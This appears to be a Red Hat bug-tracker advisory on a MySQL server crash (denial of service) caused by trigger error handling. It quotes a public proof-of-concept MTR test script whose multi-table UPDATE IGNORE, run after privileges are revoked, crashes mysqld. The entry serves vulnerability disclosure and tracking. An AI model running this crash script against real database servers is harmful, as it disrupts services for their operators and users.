Hide Forgot
It was found that MySQL server did not properly handle processing of error message, which arose during trigger execution, when another active SELECT SQL statement was present. A remote attacker, valid SQL user could use this flaw to cause denial of service (mysqld daemon crash) via specially-crafted SQL query. References: [1] http://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html [2] http://bugs.mysql.com/bug.php?id=55421 Note: On Red Hat Enterprise Linux systems exploitation of this issue would lead only to temporary denial of service, since mysqld daemon gets automatically restarted upon encountering a crash.
Public PoC from [2]: ==================== # Non-concurrent MTR test --disable_warnings DROP DATABASE IF EXISTS celosia_features; --enable_warnings CREATE DATABASE celosia_features; USE celosia_features; GRANT ALL ON celosia_features.* TO 'systuser'@'localhost'; --connect(con1,localhost,systuser,,celosia_features) CREATE TABLE t_celosia_1 ( `user_num` bigint(20) unsigned DEFAULT NULL, `year` year(4) DEFAULT NULL, `modified` time DEFAULT NULL ); INSERT INTO t_celosia_1 VALUES (7197513499,1937,'20:36:48'); CREATE TRIGGER celosia_features.upd_t_celosia_1 BEFORE UPDATE ON t_celosia_1 FOR EACH ROW SET new.modified = NOW(); CREATE TABLE `t_celosia_2` ( `user_num` char(5) DEFAULT NULL, `year` year(2) DEFAULT NULL, `modified` timestamp NOT NULL ); INSERT INTO `t_celosia_2` VALUES ('32264',56,'2010-07-18 17:36:31'); --connection default REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'systuser'@'localhost'; UPDATE IGNORE t_celosia_1 table1, t_celosia_2 table2 SET table1.user_num = 192720, table2.user_num = '39582' WHERE table1.year = '1937' AND table2.year = '56'; # Cleanup DROP DATABASE celosia_features; DROP USER 'systuser'@'localhost'; --exit
This issue did NOT affect the versions of the mysql package, as shipped with Red Hat Enterprise Linux 4, 5, and 6. -- This issue did NOT affect the versions of the mysql package, as shipped with Fedora release of 14 and 15.